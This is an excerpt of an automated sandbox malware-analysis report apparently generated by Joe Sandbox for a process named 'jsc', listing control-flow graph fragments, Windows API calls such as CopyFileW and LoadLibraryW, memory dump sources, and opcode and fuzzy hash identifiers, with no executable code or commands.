                                                                                        • Instruction Fuzzy Hash: EB418DB1D013199FCB50DFA9D9447EEBBF5EF48720F24816AE848EB241D3359A05CBA1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1406 69bc40c-69bf42a 1409 69bf42c-69bf432 1406->1409 1410 69bf435-69bf439 1406->1410 1409->1410 1411 69bf43b-69bf43e 1410->1411 1412 69bf441-69bf47e CopyFileW 1410->1412 1411->1412 1413 69bf480-69bf486 1412->1413 1414 69bf487-69bf4af 1412->1414 1413->1414
                                                                                        APIs
                                                                                        • CopyFileW.KERNEL32(?,00000000,?), ref: 069BF471
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439545783.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_69b0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID: CopyFile
                                                                                        • String ID:
                                                                                        • API String ID: 1304948518-0
                                                                                        • Opcode ID: b7d4760951c9ad10837db6493276de143dc2fb428f8e450139f80b1489b902bd
                                                                                        • Instruction ID: 63e39e5ca540891dda77ec4eec3fdc4040c2ec3d348522ca2293482591d902fb
                                                                                        • Opcode Fuzzy Hash: b7d4760951c9ad10837db6493276de143dc2fb428f8e450139f80b1489b902bd
                                                                                        • Instruction Fuzzy Hash: E93159B1C013199FCB50CF99D9857EEBBF5EF48310F14816AE808AB341D7389A40CBA4

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1417 69b7688-69b76d0 1419 69b76d8-69b7703 LoadLibraryW 1417->1419 1420 69b76d2-69b76d5 1417->1420 1421 69b770c-69b7729 1419->1421 1422 69b7705-69b770b 1419->1422 1420->1419 1422->1421
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,069B7546), ref: 069B76F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439545783.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_69b0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: d848ad9684aa6d9818544aa334cd9edfde990530e3b9464b4fdbbcc68d9d6574
                                                                                        • Instruction ID: f4cf836585418aebcfa211a8553cb6703a5909542534e83c7b9bbf2f7f954ee6
                                                                                        • Opcode Fuzzy Hash: d848ad9684aa6d9818544aa334cd9edfde990530e3b9464b4fdbbcc68d9d6574
                                                                                        • Instruction Fuzzy Hash: 1D1114B5C003498FDB20DF9AD544BDEFBF9AB88210F10842AD459AB710D375A546CFA1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1425 69b7038-69b76d0 1427 69b76d8-69b7703 LoadLibraryW 1425->1427 1428 69b76d2-69b76d5 1425->1428 1429 69b770c-69b7729 1427->1429 1430 69b7705-69b770b 1427->1430 1428->1427 1430->1429
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,069B7546), ref: 069B76F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439545783.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_69b0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 9ab5e35345dfc5256698772cd8e8c2a678bded9f2b4dd4195bc7b7e2df97927c
                                                                                        • Instruction ID: 22d54af2b80a52be337b42514f861277e52b988b50c477dba44e069433ecc481
                                                                                        • Opcode Fuzzy Hash: 9ab5e35345dfc5256698772cd8e8c2a678bded9f2b4dd4195bc7b7e2df97927c
                                                                                        • Instruction Fuzzy Hash: EF1126B5C003498FDB20DF9AC944BDEFBF5EB88210F10856AD419BB610C375A945CFA5

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1433 15e0ce0-15e0d54 GetConsoleWindow 1436 15e0d5d-15e0d82 1433->1436 1437 15e0d56-15e0d5c 1433->1437 1437->1436
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1432031452.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_15e0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2863861424-0
                                                                                        • Opcode ID: 2bea1937b07ef0b8d8c65bc74a0578b5b61b6f0260c435475ead536776d9774f
                                                                                        • Instruction ID: 181c502bc077831981b87acfb99cb1303a93213ed327bddba52c4bfbdc668504
                                                                                        • Opcode Fuzzy Hash: 2bea1937b07ef0b8d8c65bc74a0578b5b61b6f0260c435475ead536776d9774f
                                                                                        • Instruction Fuzzy Hash: 67115871D003498FDB24DFAAD4457EEBBF5EB48320F20841AD459A7240CB796945CFA0
                                                                                        APIs
                                                                                        • KiUserExceptionDispatcher.NTDLL ref: 015E18BE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1432031452.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_15e0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatcherExceptionUser
                                                                                        • String ID:
                                                                                        • API String ID: 6842923-0
                                                                                        • Opcode ID: 6f72269a803df2f867bbbc40fa20d75568051e36f7f4c3bc098cf407c82d8b1e
                                                                                        • Instruction ID: 6c8c027211cc37aff76e30c18f154027ce2168b3ac1901844d76402c842515f7
                                                                                        • Opcode Fuzzy Hash: 6f72269a803df2f867bbbc40fa20d75568051e36f7f4c3bc098cf407c82d8b1e
                                                                                        • Instruction Fuzzy Hash: E0015E35F002158FCB58EBBDD8545AEBBF5FF8861071148A5E519EB360EB34DD018B90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1441 15e0ce8-15e0d54 GetConsoleWindow 1444 15e0d5d-15e0d82 1441->1444 1445 15e0d56-15e0d5c 1441->1445 1445->1444
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1432031452.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_15e0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2863861424-0
                                                                                        • Opcode ID: 2c6426484a97d491b5c9c32629fd223e277854615cf9693a891c213c22dd6ffd
                                                                                        • Instruction ID: 27b83604e798808e0ca2f3cf9240e8b94392a43876a7a9996e757416c4c7f11f
                                                                                        • Opcode Fuzzy Hash: 2c6426484a97d491b5c9c32629fd223e277854615cf9693a891c213c22dd6ffd
                                                                                        • Instruction Fuzzy Hash: A6114875D003098FDB24DFAAC4457DEFBF5EB48320F108419D559A7240CB79A944CFA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 07d351276a125151e82bd26b90043439945f2ecb3f25cd78eade8dab7bbe33fd
                                                                                        • Instruction ID: ebb5385a0fd30773b177c43f58420a25cabedca8ec758aa1c7778be338ef4d12
                                                                                        • Opcode Fuzzy Hash: 07d351276a125151e82bd26b90043439945f2ecb3f25cd78eade8dab7bbe33fd
                                                                                        • Instruction Fuzzy Hash: B5C23B74B102189FDB15DB55C894FADBBB2FF88300F508499E609AB3A1DB71EE418F91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 923af32df774e1f1c1c34fdb9628c5b8c8b030d17acaf090b083d31d298d0bba
                                                                                        • Instruction ID: 67a68a447a27e95015e6c428d3e9886f1ef994401f3ce20553f987cfac310651
                                                                                        • Opcode Fuzzy Hash: 923af32df774e1f1c1c34fdb9628c5b8c8b030d17acaf090b083d31d298d0bba
                                                                                        • Instruction Fuzzy Hash: 94A1BE74B002069FEF54DB68D994A6EBBF2FF88710B1584AAE506DB3A1CB34DC05CB51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: )
                                                                                        • API String ID: 0-2427484129
                                                                                        • Opcode ID: 44dc653d9be052c3ead330e8da6d652535f619cc45c1d5fa320f92335eb13b79
                                                                                        • Instruction ID: 017756a59274bf72c1dce64bf4bed58c6669c4d7a2a18e315b30094dc103513f
                                                                                        • Opcode Fuzzy Hash: 44dc653d9be052c3ead330e8da6d652535f619cc45c1d5fa320f92335eb13b79
                                                                                        • Instruction Fuzzy Hash: 16C0122160B2E00AD72A562875081C62E508B46021F0A1096D848C6542D5681D45C6D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b7b202c72e34d4722d6de8070a7bebebb41ccd1e240f1c7cc635de3c12d588d1
                                                                                        • Instruction ID: 6b3e6be19cbe50a566c7de5e3f1825abff74f50349384ad195bd189389003af6
                                                                                        • Opcode Fuzzy Hash: b7b202c72e34d4722d6de8070a7bebebb41ccd1e240f1c7cc635de3c12d588d1
                                                                                        • Instruction Fuzzy Hash: DA424770B107258FEB64AF65E45066EBAF2FBC5701B40494CD6039F390CB7AED068B86
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8daf268b27fb7b788df9b7c6bf24e7a53796c7c81a5b9b97ddf41900fcbe9fac
                                                                                        • Instruction ID: 0cc8065cd81e3ecfe480f992af0ca9a440011fe5107be759193f4b69e5a743df
                                                                                        • Opcode Fuzzy Hash: 8daf268b27fb7b788df9b7c6bf24e7a53796c7c81a5b9b97ddf41900fcbe9fac
                                                                                        • Instruction Fuzzy Hash: A6228274B102149FDB65DB14C894FAEB3B2FF88704F518489EA0A9F391CB75ED818B91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8dd387a03caa271663b24010343572b4e8ef9e5294b5b03db400c822bce62d9a
                                                                                        • Instruction ID: 8369570e6cd11f654dbfac95e4be5cc6a1cfb1609eebcdb7ed0acd9b44a02c8e
                                                                                        • Opcode Fuzzy Hash: 8dd387a03caa271663b24010343572b4e8ef9e5294b5b03db400c822bce62d9a
                                                                                        • Instruction Fuzzy Hash: 28126970B106158FEB64AF65E450A6EBBF2FF85701F00494CD5029F3A1CB7AED468B86
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 16bf47827b36154f9f761d92a46002761ec56022acc862b9345e1f7e4278e499
                                                                                        • Instruction ID: d368d04bfeb7f3d037bf2bc2d77d835123c2e08e666e469e7345549c13666c81
                                                                                        • Opcode Fuzzy Hash: 16bf47827b36154f9f761d92a46002761ec56022acc862b9345e1f7e4278e499
                                                                                        • Instruction Fuzzy Hash: 88025A70A10615CFEB64AF65E450A6EBBF2FF85701F00494CD5029F3A1CB76ED468B86
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ad04691b22e5f4a65a0d9f6641dd841d14384a0ef39b7616ada8b029d0f898cb
                                                                                        • Instruction ID: 2603cf696c0d0fc2d10fd0cccf49067a726c7fb1ce4e28234a24883248d121f7
                                                                                        • Opcode Fuzzy Hash: ad04691b22e5f4a65a0d9f6641dd841d14384a0ef39b7616ada8b029d0f898cb
                                                                                        • Instruction Fuzzy Hash: 07027870A10614DFEB54AF65E450B6EBBF2FF85700F008949D6029F3A1CB76ED468B86
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f37e2ba096bba5b00c942798c6094832b6854394fe2db622b785fe2043d1887f
                                                                                        • Instruction ID: aefe23f968c9c1a0d6dc250646d6de9bbe0321087abb157d935e523f5a226ccb
                                                                                        • Opcode Fuzzy Hash: f37e2ba096bba5b00c942798c6094832b6854394fe2db622b785fe2043d1887f
                                                                                        • Instruction Fuzzy Hash: 90F15870A10214DFEB54DF65E854B6EBBB2FF85704F008489D6029F3A1CB76ED468B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 91ce43b5f389994a8f400b6f8c63e6043bdf7b638e8d05e73fb68509609d55dd
                                                                                        • Instruction ID: dc9fe96a11c9dc5fa861badf590f56eed0760cb719404d20a475a7a4eb46a370
                                                                                        • Opcode Fuzzy Hash: 91ce43b5f389994a8f400b6f8c63e6043bdf7b638e8d05e73fb68509609d55dd
                                                                                        • Instruction Fuzzy Hash: 24E16870B10214DFEB549F65E854B6E7BB2BF85700F108489E6029F3A1CB76ED468B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6f2dcc63eaa39ac76d48c090fec9d6a7ee7529ae4bafcb677dda97e2d746030f
                                                                                        • Instruction ID: e2822602534b42eb5c9e1469289ad0cc7fa1b6e25c372cef383385469baf8231
                                                                                        • Opcode Fuzzy Hash: 6f2dcc63eaa39ac76d48c090fec9d6a7ee7529ae4bafcb677dda97e2d746030f
                                                                                        • Instruction Fuzzy Hash: 67E149B5A01209DFEB01DFA8D480A9DBBF6FF49214F148159E809AB351D731ED46CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ae69340aeade0f326d2a308f6b1a28d1262c56052b26b454273eb6b4b20be398
                                                                                        • Instruction ID: b7feff81a229caa89fba7e4cd66f8956e82d676280f36ae302e6fa441559992d
                                                                                        • Opcode Fuzzy Hash: ae69340aeade0f326d2a308f6b1a28d1262c56052b26b454273eb6b4b20be398
                                                                                        • Instruction Fuzzy Hash: E3D16970B04204DFEB45DF65D855B6A7BB6BF89300F14809AE6028F3A2CB76DD45CB92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: df3189f98cb7e18cbd5dec701987f5f5b7799453218c927182dd535c8edccbe3
                                                                                        • Instruction ID: 12f63fc00840760bff84e6b99084348eff0eb20ef5eaa176de7e1fe11dc8ec46
                                                                                        • Opcode Fuzzy Hash: df3189f98cb7e18cbd5dec701987f5f5b7799453218c927182dd535c8edccbe3
                                                                                        • Instruction Fuzzy Hash: 81C16C34B20204AFCB05DF94C994E9DBBB2FF49700B90805AFA059F3A5C672ED15CB56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e4a1ea222df6e2e1002f8c444b730b9040c16e3e385257714607812823bdd18a
                                                                                        • Instruction ID: 0fe1160ee84631c285db6763ebcb110fe180f48ebaf4e32e42da9a03d127f7ca
                                                                                        • Opcode Fuzzy Hash: e4a1ea222df6e2e1002f8c444b730b9040c16e3e385257714607812823bdd18a
                                                                                        • Instruction Fuzzy Hash: 8D91AE74B102159FDB04DF69D884E9EBBF2FF88700B1580A9E905AB3A1DB30EC05CB61
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1439620689.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_6a00000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 186408d6558e1110d0656d86fb955c99a819de68d2449845b60c668349a8fcb7
                                                                                        • Instruction ID: b1a2e932d843eeb3114b96c70788c1736dcb3fc8839ece8a6cd988664889c8f5
                                                                                        • Opcode Fuzzy Hash: 186408d6558e1110d0656d86fb955c99a819de68d2449845b60c668349a8fcb7
                                                                                        • Instruction Fuzzy Hash: 8C512831B042058FEB51BBA9E8405AABBF5EFCA311B1485BED845CB691EB31CC45C7A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3a9d9a48ebeec3ddbedb280904e8db7cc04c7c7d9a8795e8b2bb3a93283e813
                                                                                        • Instruction ID: 3ea2eeb2ab7ad966b29d196c01ddb764d62c75e0e3eeba6c30cb1e7ba671c86a
                                                                                        • Opcode Fuzzy Hash: b3a9d9a48ebeec3ddbedb280904e8db7cc04c7c7d9a8795e8b2bb3a93283e813
                                                                                        • Instruction Fuzzy Hash: 1251F674A0120ADFDB05DFA8D984ADDBBB2FF49204F24C159E805AB364DB31ED46CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 429b48fdbf741d614c3d6d7ff8ea89eae850edcfab0b6df9d57e9cddf6e382e3
                                                                                        • Instruction ID: 103f97df372171deda4deb48a1f4599ab4bc3abff35b2cb666e0d1100c47da68
                                                                                        • Opcode Fuzzy Hash: 429b48fdbf741d614c3d6d7ff8ea89eae850edcfab0b6df9d57e9cddf6e382e3
                                                                                        • Instruction Fuzzy Hash: 7A4159B6310600DFD714CF69E998A2ABBFAFF89210B154599E14ACB772CB34EC41CB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2df0b96484d11b3d4d08515f4716d875d760461caeda73a46c8d3a8550a7ffef
                                                                                        • Instruction ID: 25a0b3e59742704be18de6048c8b66012cbcb9342319dcb1b82c55a386a84bac
                                                                                        • Opcode Fuzzy Hash: 2df0b96484d11b3d4d08515f4716d875d760461caeda73a46c8d3a8550a7ffef
                                                                                        • Instruction Fuzzy Hash: 6831B6B1714600AFE7099B6CE444A6A77FBFFC961171441AAE10ACB7A1DB31DC42C790
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a7c69e6099036b5244c90e7242ef941a7faccf4c230b244c9bd8c09a68d93b00
                                                                                        • Instruction ID: aad54855b64ede878eba21d7ba255e81f70d484f1fa404fbb844ce4ab9f6c747
                                                                                        • Opcode Fuzzy Hash: a7c69e6099036b5244c90e7242ef941a7faccf4c230b244c9bd8c09a68d93b00
                                                                                        • Instruction Fuzzy Hash: C221A0F2B00206DFEB14EF75E8908BEBBB6BF89200B500169C45A9B361DB30DD01C791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1431823770.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_158d000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 592b3b5e4f6c18358dc7d161a4c7716806e6d71668b0eb1f9ade76f093e442c5
                                                                                        • Instruction ID: 39b85241bdf5149acf90f97f1c6b798985d361b0c8b9d839756ff5fcdad9b296
                                                                                        • Opcode Fuzzy Hash: 592b3b5e4f6c18358dc7d161a4c7716806e6d71668b0eb1f9ade76f093e442c5
                                                                                        • Instruction Fuzzy Hash: 5521E272504240DFDB15EF54D9C0B1ABBF5FB88314F24C669E9491E286C33AD817CBA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0a024305c57b73e4234473abaf7d47b665d38866e0f3e718a957466b50e565d1
                                                                                        • Instruction ID: 4feee419df0092e19fd16b4ffb211d01373fb8d5c9aa0a18b6d9545bd24e63af
                                                                                        • Opcode Fuzzy Hash: 0a024305c57b73e4234473abaf7d47b665d38866e0f3e718a957466b50e565d1
                                                                                        • Instruction Fuzzy Hash: C22177B6C043599FDB11DFAAD884ACEBFF4EF49310F14805AE458AB211C334A949CFA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1431864034.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_159d000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3842e83baeba18d63857e25f89b47caf96dda6f001895e626f02890864695baf
                                                                                        • Instruction ID: 09b344d87b4ef7144c09ea0efe244a3174623801f3146e98864de6961dac2f85
                                                                                        • Opcode Fuzzy Hash: 3842e83baeba18d63857e25f89b47caf96dda6f001895e626f02890864695baf
                                                                                        • Instruction Fuzzy Hash: 00210171604200EFDF11DF94D980B2ABBB5FB84321F24C969D8494F246C33AD446CAA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1431864034.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_159d000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 97770676e3d13ccf46bf2c71fb32a4a3408cf6c0284961b059f2b48623c1bb08
                                                                                        • Instruction ID: b78f62bc9956fad71991090fa22b3d3070b8b0e9fd905ad22885865b2076ed74
                                                                                        • Opcode Fuzzy Hash: 97770676e3d13ccf46bf2c71fb32a4a3408cf6c0284961b059f2b48623c1bb08
                                                                                        • Instruction Fuzzy Hash: 7B21F1716042009FDF05DF94D580B26BBB1FB84318F20C969D8094F242C37AD406CB63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e29e17c9c135630e622c85a64ab70b85170e53c6ab331cf4c26791d152e4bf95
                                                                                        • Instruction ID: f660c968050cad3e2b14accf9b45aa5fa7f3fbf253cfb748618825852147b2ed
                                                                                        • Opcode Fuzzy Hash: e29e17c9c135630e622c85a64ab70b85170e53c6ab331cf4c26791d152e4bf95
                                                                                        • Instruction Fuzzy Hash: 53210832E04305AFDB04DB76EC0459EBBB6EFC6310B05817AE504DB111DB306915C791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1442653389.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_73d0000_jsc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: af1c5da1c86c1eddafab4f117827344b9453e985f334d0b674bfdb196da1808c
                                                                                        • Instruction ID: 51b72c4d9745ea2a0169885d7c90a5019a5b8ce746b89a79297d297663dfcbe0
                                                                                        • Opcode Fuzzy Hash: af1c5da1c86c1eddafab4f117827344b9453e985f334d0b674bfdb196da1808c
                                                                                        • Instruction Fuzzy Hash: FF1106BA2263509FDB258B24F5605EA7BF9BF85211304446EE88AC7182C734D945CB71
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.1431823770.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
